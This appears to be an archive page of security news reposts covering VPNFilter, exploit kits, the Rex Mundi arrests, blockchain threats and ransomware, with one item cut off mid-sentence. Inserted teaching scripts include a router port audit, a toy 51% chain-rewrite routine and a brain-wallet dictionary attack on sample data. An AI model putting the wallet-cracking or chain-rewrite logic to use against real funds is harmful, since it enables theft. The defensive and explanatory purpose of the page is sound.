Category Archives: Cybercrime

Free Societies are at a Disadvantage in National Cybersecurity

Jack Goldsmith and Stuart Russell just published an interesting paper, making the case that free and democratic nations are at a structural disadvantage in nation-on-nation cyberattack and defense. From a blog post:

It seeks to explain why the United States is struggling to deal with the "soft" cyber operations that have been so prevalent in recent years: cyberespionage and cybertheft, often followed by strategic publication; information operations and propaganda; and relatively low-level cyber disruptions such as denial-of-service and ransomware attacks. The main explanation is that constituent elements of U.S. society -- a commitment to free speech, privacy and the rule of law; innovative technology firms; relatively unregulated markets; and deep digital sophistication -- create asymmetric vulnerabilities that foreign adversaries, especially authoritarian ones, can exploit. These asymmetrical vulnerabilities might explain why the United States so often appears to be on the losing end of recent cyber operations and why U.S. attempts to develop and implement policies to enhance defense, resiliency, response or deterrence in the cyber realm have been ineffective.

I have long thought this to be true. There are defensive cybersecurity measures that a totalitarian country can take that a free, open, democratic country cannot. And there are attacks against a free, open, democratic country that just don't matter to a totalitarian country. That makes us more vulnerable. (I don't mean to imply -- and neither do Russell and Goldsmith -- that this disadvantage implies that free societies are overall worse, but it is an asymmetry that we should be aware of.)

I do worry that these disadvantages will someday become intolerable. Dan Geer often said that "the price of freedom is the probability of crime." We are willing to pay this price because it isn't that high. As technology makes individual and small-group actors more powerful, this price will get higher. Will there be a point in the future where free and open societies will no longer be able to survive? I honestly don't know.

McAfee Blogs: Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling

With this writing, we’re joyfully en route to a much-anticipated Florida vacation. A sneak peek into our car — and the thousands of other cars headed south on Interstate 4 — offers a reflection of family life today. Mom has her earbuds on and is listening to her newest audiobook, Dad is nodding along with his favorite podcaster over the car stereo, and the teenager in the back seat is making faces into her phone for her Snapchat pals.

Can we get through this vacation without our faces planted in our phones? Can we find ways to unplug more and plug into the moment? That’s certainly our plan. However, each one of us will have to rely on his or her tech from time to time. Frankly, who doesn’t these days?

Our Tech Reality

It’s nearly impossible to vacation minus our electronics, but we’ve agreed to unplug for several reasons. The first reason, of course, is the goal of being present and enjoying our time together. The second reason we want to limit our tech use while traveling is safety. Nothing has the power to obliterate a family vacation faster than stolen data, credit card info, or devices.

5 tips for a more secure family vacation

  1. Keep devices protected and close. Device theft season is upon us. And, distracted vacationers are the perfect target. So, make sure your smartphone is password protected, security settings are tuned up, and screen lock is on. Keep your phones, tablets, laptops, and handheld gaming devices on your person or locked in a hotel safe when you are away. And, leave at home any electronic equipment you don’t need during your trip.
  2. Turn on Find My Phone. This is a bigger deal than you might guess. No one plans on losing a phone, but hey, it happens. Have the “don’t lose your phone” conversation with your kids several times but back that up by having everyone in the family turn on his or her lost phone app just in case. Consider an extra layer of protection on mobile devices with mobile security software.
  3. Be cautious when using public Wi-Fi. If you need to send an email or photos, or want to preserve your family’s data plan by jumping on the hotel’s public Wi-Fi while on vacation, make sure that Wi-Fi is secure and belongs to a trusted source. Ask for the establishment’s Wi-Fi name and log on to that exact name: attackers can easily set up fake hotspots (so-called evil twins) with similar names. Also, if you aren’t actively using a hotspot, turn off your Wi-Fi setting as well as the “auto-join” setting so that your device does not silently reconnect to networks around it. Consider shutting off Bluetooth as well. To be extra sure of security, two tips from the Federal Communications Commission: while using a public Wi-Fi network, periodically adjust your phone settings to forget the network, then log back in again. And, if you want to assess the network’s security, try purposely logging onto the public Wi-Fi using the wrong password. If you can get on anyway, that’s a sign that the network is not secure. The best way to stay safe while traveling may be a Virtual Private Network, or VPN. According to one McAfee study, when it comes to Wi-Fi security specifically, 58% of survey respondents know how to check if a Wi-Fi network is secure and safe to use, but less than half (49%) take the time to ensure their connection is secured. Be aware and don’t be in that latter group.
  4. Keep software updated. Before you travel, check for any software updates on your devices. Updates often fix security bugs and seal up cracks in the system. Add another layer of protection by safeguarding your devices with security software.
  5. Avoid accessing financial data. It’s a good idea to get your banking in order before you leave for vacation. Moving funds from one account to another, or even checking your balance, can expose you to attackers if you have to do it on a public network.

One of the most significant ways you can secure your family vacation is adopting a mindset of awareness. We get excited while on vacation. We want to send those pictures, transfer that money, or get that email out of the way. Very few of us — especially our kids — are concerned about cyber crooks and thieves trying to ransack our well-laid vacation plans. With a few extra minutes invested into your travel plans, you can thoroughly enjoy your family time.

The post Vacation Checklist: 5 Easy Ways to Help Secure Your Family’s Devices When Traveling appeared first on McAfee Blogs.




Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang

Europol announced that several French nationals were arrested over the past year on suspicion of being involved with the notorious Rex Mundi crime gang.

Another Europol success made the headlines: the European police agency announced that several French nationals were arrested over the past year on suspicion of belonging to the hacker group known as Rex Mundi (“King of the World”).

The Rex Mundi crime group has been active since at least 2012. It hacked into the systems of several organizations worldwide and attempted to blackmail them.

The list of the victims is long and includes AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE).

The hackers stole sensitive information from their victims and then demanded payment for not disclosing the stolen data.

The operation coordinated by the Europol was launched in May 2017 after the group targeted a UK-based company. Crooks stole significant amounts of customer data from the company, then attempted to blackmail it by demanding the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not disclosing the incident. The group also requested more than €825,000 ($776,000) for details on the hack.

The hackers also demanded an additional €210,000 ($240,000) from the victim for each day the payment was delayed.

“A 25-year-old coder was arrested on 18 May by the Royal Thai Police based on a French international arrest warrant. The arrest of this young cybercriminal was the eighth in an international operation supported by Europol and the Joint Cybercrime Action Taskforce (J-CAT) that started exactly one year ago.” reads the announcement published by Europol.

“In May 2017 a British-based company was the victim of a cyber-attack during which a large amount of customer data was compromised. The attack was immediately claimed by an organisation called Rex Mundi.”

After the victim reported the incident to the authorities, the UK’s Metropolitan Police, the French National Police and Europol launched a joint operation that led to the identification of a French national.

“Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” continues Europol.

In June 2017, the authorities identified and arrested five suspects; two more were arrested in October 2017 and the last one on May 18, 2018.

All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The last member of the crew is a 25-year-old developer who was arrested last month by the Royal Thai Police.

The leader of the Rex Mundi group admitted blackmailing the company but claimed to have hired hackers on the Dark Web to hack the victims.

Pierluigi Paganini

(Security Affairs – Rex Mundi, cybercrime)

The post Europol dismantled the Rex Mundi hacker crew, it arrested another member of the gang appeared first on Security Affairs.

UK law enforcement: an uphill struggle to fight hackers

About 16 years ago in the UK, I walked into a local police station to report a computer crime, because walking into local police stations is how they did things back then. There may well also have been penny farthing bicycles, real pea souper fogs, Mary Poppins, and Jack the Ripper, though I could well be wrong on those last two.

I was greeted at the incident report desk by a bemused officer on duty more used to dealing with stolen bikes or children stuck up trees than anything hacker related, and things went rapidly downhill from his very first question, which was, “What’s an Internet?”

The early days of UK law enforcement and the Internet

I can’t speak for everyone with my solitary anecdote, but even countries that had law enforcement bodies that were a bit more on the ball with regard to all things cyber had their problems, too. I vividly remember being asked to help [redacted entity] with something I’d researched sometime between 2005–08 (being deliberately vague here), resulting in a face-to-face meeting with someone I was half convinced was going to drag me off to a cell. I was helping! You asked me if I could help you! Sadly I can’t say feelings of reciprocal assistance were fostered in any great way, and that’s a shame.

Outside of my own experiences, many security researchers were working in almost total isolation; you couldn’t get ahold of security contacts for major social networks, nobody was on Twitter, huge organisations were missing “contact us” pages, and you were doing very well indeed if you managed to get a dialogue going with, well, pretty much anybody. All communication was done via yelling in blog comments and trying to figure out which people were at security conference dinner queues.

In short, you had hardly anyone talking, vaguely scary law enforcement with technical chops but a general lack of people skills, and officers ready and willing to ask you, “What’s an internet?”.

Frankly, I’m amazed the Internet didn’t burn down into a hole in the ground.

The present day

Things are significantly better now, and many of those problems have been addressed. Every researcher you can think of is available at short notice on sites like Twitter, we have bug bounties and halls of fame, ISPs are a lot more communicative, there are public-facing clearing houses for malware and phishing pages, and most branches of law enforcement have a much better understanding of all things digital.

That’s not to say problems don’t exist, however. A recent report claims British law enforcement is having a tough time of it. If you’ve run into a cyberattack of some kind in the UK, you may find yourself out of luck because apparently only one in three of the 44 police forces in operation are able to deal with computer crime. While police claim some 90 percent of all crime has a digital element to it, their ability to flesh out so-called “cyber units” has been found to be lacking.

Into this already problematic area follows the frequently muddled response to forms of encryption and data privacy. The recent National Crime Agency report on Serious and Organised Crime walked a fine line between acknowledging privacy boons for regular web users, while pointing out the advantage to criminals.

That’s not really a popular line of attack, as it turns out, because the UK government has a thing for wanting to backdoor forms of encryption—and people aren’t really keen on backdoored encryption. Or how about the urge to move into the facial recognition realm, despite a false positive rate of 98 percent? On top of all that, we have this killer quote from a symposium on privacy and corporations:

Tesco probably knows more about me than GCHQ.

While admittedly tongue in cheek, it does raise questions about how much, exactly, we surrender when signing up to membership cards, loyalty accounts, and everything else along the way. Law enforcement would love to get their hands on that kind of profiling, and surveillance capitalism can have major ramifications for societies as a whole.

Essentially, things sound like they’re locked into a stalemate, and no sign of relief seems to be coming anytime soon. And if law enforcement actually is struggling to keep up with datasets and tracking information available to corporations, it’s natural that they’re going to insist on access to all the things, all of the time. At which point, people get rather angry and the cycle repeats itself. Meanwhile, in all of this, the criminals are getting away with all sorts of things.

Wanted: a huge pile of cash

Funding is the be all, end all of UK policing, but with cuts across the board and real-world police numbers down, it’s a hard sell to grab some cash for Internet shenanigans, especially when nobody seems to be entirely clear on what they want to do. Train more police in forensics? DDoS analysis? Malware reversing? Which type of digital attack is likely to be most relevant to the type of police work most commonly seen in the UK? Or, do they want to leapfrog all of that and just go all out on the “Encryption is good for bad people so we definitely want backdoors, thanks” approach?

Who knows, but considering the UK has only pumped £1.3 million into cybercrime training in the last three years, it leaves a lot to be desired. The cash is split between different regions, and that doesn’t go far—as the linked article mentions, North Wales spent £360 on 1,063 individuals to get them trained up from a total pot of £375,448. Meanwhile, there are some regions where a grand total of zero people were trained in aspects of computer crime over a period of three years (perhaps the “What’s an Internet?” officer resides there).

Backup en route

It’s not all bad news. If you could go back in time 16 years and tell me that UK law enforcement would be spending a million pounds on computer crime training, I’d probably be laughing in disbelief until 2018 rolled back around.

Nowadays, there’s plenty of ways to reach the police online, and across a variety of social media. Local and national police websites will often play host to infographics—actual infographics—with useful information on them and everything! There is, at least, money still being invested in the nation as a whole as far as cyberattacks are concerned, to the tune of £1.9 billion over five years to tackle high-level malicious activity.

Even accounting for this, I get the feeling that a bit more money sent to police officers would probably help home users and businesses feel a little more secure and, hopefully, a bit more optimistic that their low-level report to an officer manning the admin desk won’t end up in a large pile of “dunno, lol.”

Imagine a world in which a cyberattack on a home user would result in a phone call to police that actually gets answered and actually gets results. Perhaps it’s only another 16 years away.

The post UK law enforcement: an uphill struggle to fight hackers appeared first on Malwarebytes Labs.

Ransomware Attackers Demand £120,000 from Dorset Business

Attackers demanded £120,000 from a Dorset business after infecting the company’s computer systems with crypto-ransomware. According to the Bournemouth Daily Echo, ransomware actors targeted an engineering firm located in Dorset, a county in the south-western part of England. A spokeswoman for the Dorset Police confirmed the attack and provided additional insight into the malefactors’ demands. […]

The post Ransomware Attackers Demand £120,000 from Dorset Business appeared first on The State of Security.

5.9 Million Card Details Accessed in Dixons Carphone Hack

Dixons Carphone, a household name in the UK, announced (PDF) today that it is investigating "unauthorised access to certain data held by the company." It describes this access as "an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores," and "1.2m records containing non-financi


VPNFilter malware still making waves

Last month, a piece of malware called VPNFilter caused chaos for owners of MikroTik, Linksys, TP-Link, and Netgear equipment. Roughly 500,000 devices worldwide fell victim, with the unwanted parasite able to listen to traffic, steal credentials, damage devices, and more. Until patches started to roll out, the options weren’t great; as one of our researchers, Jovi Umawing, told SCMagazine recently:

“While Ukraine has been a key target of destabilising cyberattacks for some time now, this particular infection is unlikely to cause issues with the Champions League final. The bigger concern is what people do to combat potential infection; restoring routers to factory settings may eliminate the malware, but it also opens the possibility of becoming vulnerable to older exploits. The best course of action at this point in time is to purchase new hardware, if at all possible.”

That’s right, people were very worried about their football match. And due to the lack of available patches at the time, people were left with the option of running out and buying a new router or sitting around inviting multiple pre-existing, vampire-style exploits over the threshold.

As it turns out, there’s a lot more to consider than who’d end up winning the Champions League, because not only is the threat still around, but it’s also slowly ramping up the problem factor.

VPNFilter: Not gone, and not forgotten

This month, it was revealed the threat was potentially worse than everyone thought, with the ability to attack endpoints otherwise safely hidden behind a firewall. Worse, the number of infected devices has risen from 500,000 to close to one million across 54 countries.

Did you breathe a sigh of relief when initial findings suggested it was “only” 15 to 20 types of router affected, none of which were yours? Well, you might want to stop, because more than 50 others have now been added to the list. A full list can be viewed on the main Talos Intelligence information page.

Make no mistake, VPNFilter malware is highly unpleasant—you don’t want it lurking on your router while it tries to (for example) downgrade HTTPS communications to something unencrypted so it can swipe sensitive data, or snag a list of visited domain names. Everything that goes in and out of a router could potentially be manipulated, so we need to ensure that we do all we can to keep it at bay.

My router is on the list, help!

First things first: don’t panic. One million compromised devices is a big number, but there are quite a few more than one million routers out there worldwide, and the odds that this is ferreting away on your hardware are still low. What you need to do is make sure your vendor has rolled out a firmware update, and apply it.

Not every device installs updates without user interaction, and you may have to dig around on the product website for the firmware yourself. In my experience that is fairly rare these days; at most, you may be redirected or see a pop-up telling you to get on with things and consent to an update.

Worst case scenario, no patch is available, and you’re stuck between deciding whether to risk sitting around with VPNFilter on your box, or rolling everything back to factory reset condition and potentially being vulnerable to older exploits.

Something to keep in mind is that router features can vary wildly, even when faced with two devices from the same manufacturer. Here’s how a basic bit of updating from Netgear works, for example, but some routers I’ve dealt with can be an absolute mess of poorly laid out tabs and menus which lead nowhere. Keep a search engine handy along with a pen and paper, just in case.

Routers should come out of the box running everything required to keep you and your data secure, but even then, you’ll probably find default logins all over the place. If nothing else, VPNFilter may have inadvertently caused us all to go back and shore up the security of our magical Internet boxes in a more general fashion. Even if VPNFilter never existed, you’ll still probably want to take advantage of secure logins, killing off unwanted services, optimising firewalls, and maybe even turning it off while out to reduce your target size and also save a bit of electricity in the bargain.
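A concrete way to act on “killing off unwanted services”: the script below, added here as an example rather than anything from the original post or from Malwarebytes, probes the router’s LAN-side address for the management services home routers commonly expose and flags every one that answers but is not on your explicit allow-list. It does not detect VPNFilter itself; it shrinks the attack surface those kinds of infections rely on (management interfaces with default or weak logins). The port list and the allow-list are assumptions you should adjust to your own device, and `192.168.1.1` is just the usual default gateway.

```python
import socket
import sys
from typing import Callable, Dict, Iterable, List

# TCP services a home/SOHO router commonly listens on (assumed list; adjust to your device).
# Every one of these that you are not knowingly using is attack surface.
MANAGEMENT_PORTS: Dict[int, str] = {
    21: "ftp",
    22: "ssh",
    23: "telnet",
    53: "dns",
    80: "http-admin",
    443: "https-admin",
    7547: "tr-069",          # ISP remote management (CWMP)
    8080: "http-alt",
    8291: "mikrotik-winbox",
    8443: "https-alt",
}

# Services you have deliberately decided to keep; anything else that answers gets flagged.
DEFAULT_ALLOW = ("53/dns", "443/https-admin")


def tcp_connect(host: str, port: int, timeout: float = 0.5) -> bool:
    """True if a TCP handshake to host:port completes, i.e. something is listening there."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def audit_router(gateway: str, ports: Dict[int, str] = MANAGEMENT_PORTS,
                 connect: Callable[[str, int], bool] = tcp_connect) -> Dict[str, bool]:
    """Probe each management port on the gateway. `connect` is injectable so the logic
    can be exercised offline with a fake prober."""
    return {f"{port}/{name}": connect(gateway, port) for port, name in ports.items()}


def findings(probe: Dict[str, bool], allowed: Iterable[str] = DEFAULT_ALLOW) -> List[str]:
    """Reachable services that are not on the allow-list: the ones to disable or lock down."""
    keep = set(allowed)
    return sorted(svc for svc, is_open in probe.items() if is_open and svc not in keep)


if __name__ == "__main__":
    # Usage: python router_audit.py 192.168.1.1   (run from a machine on the router's LAN)
    gw = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1"
    flagged = findings(audit_router(gw))
    print("exposed on LAN side:", ", ".join(flagged) or "nothing unexpected")
```

Anything this flags on the LAN side is worth turning off in the admin interface or putting behind a changed password; services reachable from the WAN side are the bigger problem, and you can only check those from outside your network (for example from a phone on mobile data against your public IP).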

It’s not over yet…

Dealing with router issues can be worrying—even those familiar with locking down every aspect of a desktop might not have the faintest idea about the blinky-light box in the corner of the room keeping the traffic moving. That’s perfectly understandable, so don’t feel bad about it. As you can see from the links up above, there are plenty of resources to sink your teeth into. You can bet that more VPNFilter antics will be in the news over the coming weeks, so keep up to date with the latest happenings. And if your router should end up on one of the affected devices lists, contact your supplier as soon as you possibly can.

The post VPNFilter malware still making waves appeared first on Malwarebytes Labs.

McAfee Blogs: Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security

On May 19 researchers discovered a series of vulnerabilities in the blockchain-based EOS platform that can lead to remote control over participating nodes. Just four days prior, a mining pool server for the IoT platform HDAC was compromised, impacting the vast majority of its miners. In January the largest-ever theft of cryptocurrencies occurred against the exchange Coincheck, resulting in the loss of US$532 million in NEM coin. Due to its increased popularity and profitability, cybercriminals have been targeting all things blockchain. McAfee Advanced Threat Research team analysts have now published the McAfee Blockchain Threat Report to explain current threats against the users and implementers of blockchain technologies.

What is Blockchain?

Even if you have not heard of blockchain, you have likely heard of cryptocurrencies, namely Bitcoin, the most popular implementation. In late 2017 Bitcoin reached a value of $20,000 per coin, prompting a lot of interest in the currency—including from cybercriminals. Cryptocurrencies are built on top of blockchain, which records transactions in a decentralized way and enables a trusted “ledger” between trustless participants. Each block in the ledger is linked to the next block, creating a chain. Hence, the system is called a blockchain. The chain enables anyone to validate all transactions without going to an outside source. From this, decentralized currencies such as Bitcoin are possible.

Proof-of-work blockchain. Source: https://bitcoin.org/bitcoin.pdf.

Blockchain Attacks

Attackers have adopted many methods targeting consumers and businesses. The primary attack vectors are phishing, malware, implementation vulnerabilities, and attacks on the core blockchain technology itself. In a phishing scheme that ran for several months and came to light in January, Iota users lost $4 million. Malware authors often change their focus: between late 2017 and early 2018 some migrated from deploying ransomware to cryptomining, and they have been found using open-source code such as XMRig for system-based mining and the browser mining service Coinhive.

Implementation vulnerabilities are the flaws introduced when new technologies and tools are built on top of blockchain. The recent EOS attack is one example. In mid-July 2017 Iota suffered an attack that essentially enabled attackers to steal from any wallet. Another currency, Verge, was found with numerous vulnerabilities. Attackers exploiting the vulnerabilities were able to generate coins without spending any mining power.

Known attacks against the core blockchain technology are much more difficult to carry out, although they are not unheard of. The most widely known is the 51% attack, or majority attack: an attacker who controls most of the network’s mining power can mine a competing chain faster than everyone else, and because nodes follow the longest valid chain, that lets the attacker rewrite recent history and double-spend coins. The group 51 Crew used it against small coins, including Krypton, and held them for ransom. Another attack, known as a Sybil attack, floods the peer-to-peer network with attacker-controlled identities; an attacker who surrounds a victim node with such peers controls what that victim sees of the ledger. Attempts at larger-scale Sybil attacks have been made, such as one in 2016.
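To make the two ideas in “What is Blockchain?” and the majority attack concrete, here is a toy proof-of-work chain in Python. It is an added example, not code from McAfee or from the threat report: blocks link by hash, anyone can validate the whole chain with no outside source, editing a block without re-mining breaks validation, and an attacker who can out-mine the network produces a longer valid chain that longest-chain nodes adopt in place of the honest one. The difficulty, the payload format and the plain longest-chain rule are simplifications for the example (real nodes compare cumulative work, and Bitcoin hashes a binary header).

```python
import hashlib
import json
from dataclasses import dataclass
from typing import List, Sequence

DIFFICULTY = 2           # leading zero hex digits required of a block hash (tiny, so mining takes milliseconds)
GENESIS_PREV = "0" * 64  # the first block links to an all-zero hash


@dataclass
class Block:
    index: int
    prev_hash: str   # hash of the previous block: the "link" that makes this a chain
    data: str        # payload, e.g. a batch of transactions
    nonce: int = 0   # varied by the miner until the hash meets the difficulty target

    def hash(self) -> str:
        header = json.dumps([self.index, self.prev_hash, self.data, self.nonce])
        return hashlib.sha256(header.encode("utf-8")).hexdigest()


def meets_target(digest: str, difficulty: int) -> bool:
    return digest.startswith("0" * difficulty)


def mine(block: Block, difficulty: int = DIFFICULTY) -> Block:
    """Proof of work: keep incrementing the nonce until the header hash meets the target."""
    while not meets_target(block.hash(), difficulty):
        block.nonce += 1
    return block


def valid_chain(chain: Sequence[Block], difficulty: int = DIFFICULTY) -> bool:
    """Full validation with no outside source: consecutive indices, every block links to
    the hash of its predecessor, and every block carries a proof of work."""
    for i, blk in enumerate(chain):
        expected_prev = GENESIS_PREV if i == 0 else chain[i - 1].hash()
        if blk.index != i or blk.prev_hash != expected_prev:
            return False
        if not meets_target(blk.hash(), difficulty):
            return False
    return True


def build_chain(payloads: Sequence[str], difficulty: int = DIFFICULTY) -> List[Block]:
    chain: List[Block] = []
    prev = GENESIS_PREV
    for i, data in enumerate(payloads):
        blk = mine(Block(i, prev, data), difficulty)
        chain.append(blk)
        prev = blk.hash()
    return chain


def tamper(chain: Sequence[Block], index: int, new_data: str) -> List[Block]:
    """Rewrite one block's payload without re-mining it or anything after it."""
    forged = [Block(b.index, b.prev_hash, b.data, b.nonce) for b in chain]
    forged[index].data = new_data
    return forged


def majority_attack(honest: Sequence[Block], fork_at: int, payloads: Sequence[str],
                    difficulty: int = DIFFICULTY) -> List[Block]:
    """51% attack: drop history from `fork_at` on and re-mine a replacement. With more hash
    power than the rest of the network the attacker eventually holds the longer chain."""
    fork = list(honest[:fork_at])
    prev = fork[-1].hash() if fork else GENESIS_PREV
    for data in payloads:
        blk = mine(Block(len(fork), prev, data), difficulty)
        fork.append(blk)
        prev = blk.hash()
    return fork


def choose_chain(a: List[Block], b: List[Block], difficulty: int = DIFFICULTY) -> List[Block]:
    """Longest valid chain wins. Length stands in for cumulative work here because every
    block is mined at the same difficulty."""
    candidates = [c for c in (a, b) if valid_chain(c, difficulty)]
    return max(candidates, key=len) if candidates else []


if __name__ == "__main__":
    honest = build_chain(["alice pays bob 5", "bob pays carol 2", "carol pays dave 1"])
    print("honest chain valid:", valid_chain(honest))
    print("edited block still valid:", valid_chain(tamper(honest, 1, "bob pays mallory 2")))
    attack = majority_attack(honest, 1, ["bob pays mallory 2", "filler", "filler"])
    print("network adopts attacker's chain:", choose_chain(honest, attack) is attack)
```

The point of the last line is the one that matters for the 51% discussion: the attacker’s chain is perfectly valid by the rules, so validation alone cannot reject it; what protects a real network is that out-mining everyone else is economically infeasible for large coins and cheap for the small ones 51 Crew went after.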

Dictionary Attacks

Blockchain may be a relatively new technology, but that does not mean old attacks cannot work against it. Dictionary attacks succeed against some blockchain implementations, mostly because of insecure user behavior. Brain wallets, whose private key is derived directly from a user-chosen passphrase, are insecure whenever that passphrase is weak, yet people still use them. These wallets are routinely emptied, as was the case with the nearly 60 BTC stolen from the following wallet:

This wallet recorded two transactions as recently as March 5, 2018. One incoming and one outgoing transaction occurred within roughly 15 minutes. Source: https://blockchain.info.
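The mechanics behind that theft, as an added example (not code from the report): a brain wallet turns a passphrase into the private key with a single unsalted SHA-256, so anyone who precomputes the keys for a wordlist and watches the ledger can sweep funds the moment they land on a matching address, which is why the incoming and outgoing transactions above sit fifteen minutes apart. The `address_for` function is an assumption made for this example: real Bitcoin addresses come from the secp256k1 public key (SHA-256, RIPEMD-160, Base58Check), which needs an elliptic-curve library, so a second hash of the key stands in here. The attack only needs the derivation to be deterministic and public, which is true of both. The ledger addresses and wordlist are constructed sample data.

```python
import hashlib
import secrets
from typing import Dict, Iterable, List


def brain_wallet_private_key(passphrase: str) -> bytes:
    """Classic brain-wallet derivation: the 32-byte private key is just SHA-256 of the
    passphrase. No salt and no stretching, so a given phrase yields the same key for everyone."""
    return hashlib.sha256(passphrase.encode("utf-8")).digest()


def random_private_key() -> bytes:
    """What a wallet should do instead: 256 bits from the OS CSPRNG."""
    return secrets.token_bytes(32)


def address_for(private_key: bytes) -> str:
    """Public identifier for a key. ASSUMPTION for this example: a second hash of the key
    stands in for the real public-key-based Bitcoin address derivation."""
    return hashlib.sha256(b"address:" + private_key).hexdigest()[:40]


def dictionary_attack(ledger_addresses: Iterable[str], candidates: Iterable[str]) -> Dict[str, str]:
    """Derive the address for every candidate phrase and match it against funded addresses
    seen on the public ledger. Returns {address: recovered passphrase}. An attacker runs this
    once over a large wordlist, then sweeps any deposit that arrives at a hit."""
    targets = set(ledger_addresses)
    hits: Dict[str, str] = {}
    for phrase in candidates:
        addr = address_for(brain_wallet_private_key(phrase))
        if addr in targets:
            hits[addr] = phrase
    return hits


# Constructed sample ledger (not real addresses): three brain wallets plus one properly
# generated key, as the attacker would see them on the chain.
WEAK_PHRASES = ["correct horse battery staple", "password1", "satoshi nakamoto"]
# Fixed rather than random so the example is reproducible; a real wallet uses random_private_key().
STRONG_KEY = bytes.fromhex("7d3f8a1b5c9e2d4f6a8b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5f6a7b8c9d0e1f")
LEDGER_ADDRESSES: List[str] = [address_for(brain_wallet_private_key(p)) for p in WEAK_PHRASES]
LEDGER_ADDRESSES.append(address_for(STRONG_KEY))

# A tiny wordlist; real attacks use hundreds of millions of phrases, quotes and song lyrics.
WORDLIST = ["123456", "password", "password1", "letmein", "bitcoin",
            "satoshi nakamoto", "correct horse battery staple", "qwerty"]


if __name__ == "__main__":
    for addr, phrase in dictionary_attack(LEDGER_ADDRESSES, WORDLIST).items():
        print(f"{addr}  <-  {phrase!r}")
```

The randomly generated key never shows up in the hits, however large the wordlist grows: the defence is not a cleverer passphrase but a key the user never chose at all.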

Exchanges Under Attack

The biggest players, and targets, in blockchain are cryptocurrency exchanges. They can be thought of as banks in which users create accounts, manage funds, and trade currencies, including traditional ones. One of the most notable incidents is the attack on Mt. Gox between 2011 and 2014 that resulted in $450 million of Bitcoin stolen and led to the liquidation and closure of the company. Coincheck, mentioned above, survived its attack and began reimbursing victims for their losses in March 2018. Not all exchanges fared so well: Bitcurex abruptly closed, prompting an official investigation into the circumstances, and Youbit suffered two attacks that drove the company into bankruptcy.

An advertisement for the shuttered Polish exchange Bitcurex.

Conclusion 

Blockchain technologies and their users are heavily targeted by profit-driven cybercriminals. Current attackers are changing their tactics and new groups are entering the space. As more businesses look to blockchain to solve their business problems and consumers increasingly rely on these technologies, we must be diligent in understanding where the threats lie in order to achieve proper and tailored risk management. New implementations must place security at the forefront. Cybercriminals have already enjoyed successes against the users and implementations of blockchain, so we must prepare accordingly.

The post Threat Report: Don’t Join Blockchain Revolution Without Ensuring Security appeared first on McAfee Blogs.

Has paying the ransom become business as usual?

Radware released its 2018 Executive Application and Network Security Report. For the first time in the survey’s five-year history, a majority of executives (53%) reported paying a hacker’s ransom following a cyber attack. According to the report, 69% of executives said that their company faced a ransom attack in the past year, compared with only 14% noting so in 2016. Meanwhile, two-thirds of executives (66%) report a lack of confidence in their network security, admitting … More

The post Has paying the ransom become business as usual? appeared first on Help Net Security.

U.S. sanctions Russian companies, individuals over cyber attacks

Acting on an executive order, the U.S. government imposed sanctions on five companies and three individuals for their collaboration with the Russian Federal Security Service (FSB) in state-sponsored cyber-attack activity. Three of the companies hit with sanctions by the U.S. Department of the Treasury are a cybersecurity firm Digital Security and...


Exploit kits: Spring 2018 review

Since our last report on exploit kits, there have been some new developments with the wider adoption of the February Flash zero-day, as well as the inclusion of a new exploit for Internet Explorer. We have not seen that many changes in the drive-by landscape for a long time, although these are the results of improvements closely tied to malspam campaigns and exploits embedded within Microsoft Office.

Since both Flash and the VBScript engine are pieces of software that can be leveraged for web-based attacks, it was only natural to see their integration into exploit kits. While Internet Explorer is not getting any younger, CVE-2018-8174 brings an update to an otherwise 2-year-old vulnerability (CVE-2016-0189), which is still used in some drive-by campaigns. As far as Flash is concerned, CVE-2018-4878 has been adopted by almost all exploit kits. At the time of this writing, a newer Flash vulnerability (CVE-2018-5002) is available but has not been spotted in any EK so far.

RIG

RIG exploit kit remains the most commonly observed EK in the wild, with several different campaigns in action. RIG was the first to include the new VBScript engine exploit (CVE-2018-8174) in IE, only days after a proof of concept became publicly available, on top of adding CVE-2018-4878. RIG has pushed various payloads such as Bunitu, Ursnif, and the popular SmokeLoader.

GrandSoft

GrandSoft is an IE-only exploit kit which is observed in a smaller range of distribution campaigns, mostly via malvertising on adult sites. In comparison to its counterparts, GrandSoft is still relying on the older Internet Explorer exploit (CVE-2016-0189) and lacks the obfuscation we normally see in landing pages. Some payloads pushed by GrandSoft include the AZORult stealer.

Magnitude

The South Korea–focused exploit kit is back to using its trusted EK Magniber after having a short stint with GandCrab ransomware. Magnitude added Flash (CVE-2018-4878) and went on to integrate IE’s CVE-2018-8174 after a hiatus of about a week with no activity. With its own Magnigate filtering, Base64-encoded landing page and fileless payload, Magnitude is one of the more sophisticated exploit kits on the market.

GreenFlash Sundown

The elusive GreenFlash Sundown continues to strike via compromised OpenX ad servers. Although it is usually seen distributing the Hermes ransomware, 360 Total Security observed a cryptocurrency miner via several Chinese websites running a vulnerable OpenX version. The ad banner used by GF Sundown in this attack, as well as some we documented before, is a Korean language picture that hides CVE-2018-4878 using steganography.

A busy 2018

There is no doubt that the recent influx of zero-days has given exploit kits a much-needed boost. We did notice an increase in RIG EK campaigns, which probably resulted in higher than usual successful loads for its operators. While attackers are concentrating on Microsoft Office–related exploits, we are observing a cascading effect into exploit kits.

So far, 2018 has been busier than usual with the discoveries of several directly applicable zero-days, and we can expect to see more in the coming months. For instance, we have already witnessed back-to-back Flash zero-days where attackers are capitalizing on ActionScript vulnerabilities.

Mitigation

We tested these exploit kits against Malwarebytes, and they were all blocked thanks to our signature-less anti-exploit engine:

Hashes for samples referenced in this post:


The post Exploit kits: Spring 2018 review appeared first on Malwarebytes Labs.

Thriving Cybercrime Economy Contributes to More Than $1 Billion in Stolen Cryptocurrency

Users lost $1,148,763,000 in cryptocurrency to cyberthieves during the first half of 2018, a recent study found. The researchers explored various illicit forums on the Dark Web and uncovered a $6.7 million cybercrime economy that revolves around the theft of bitcoin, Ethereum and other digital currencies.

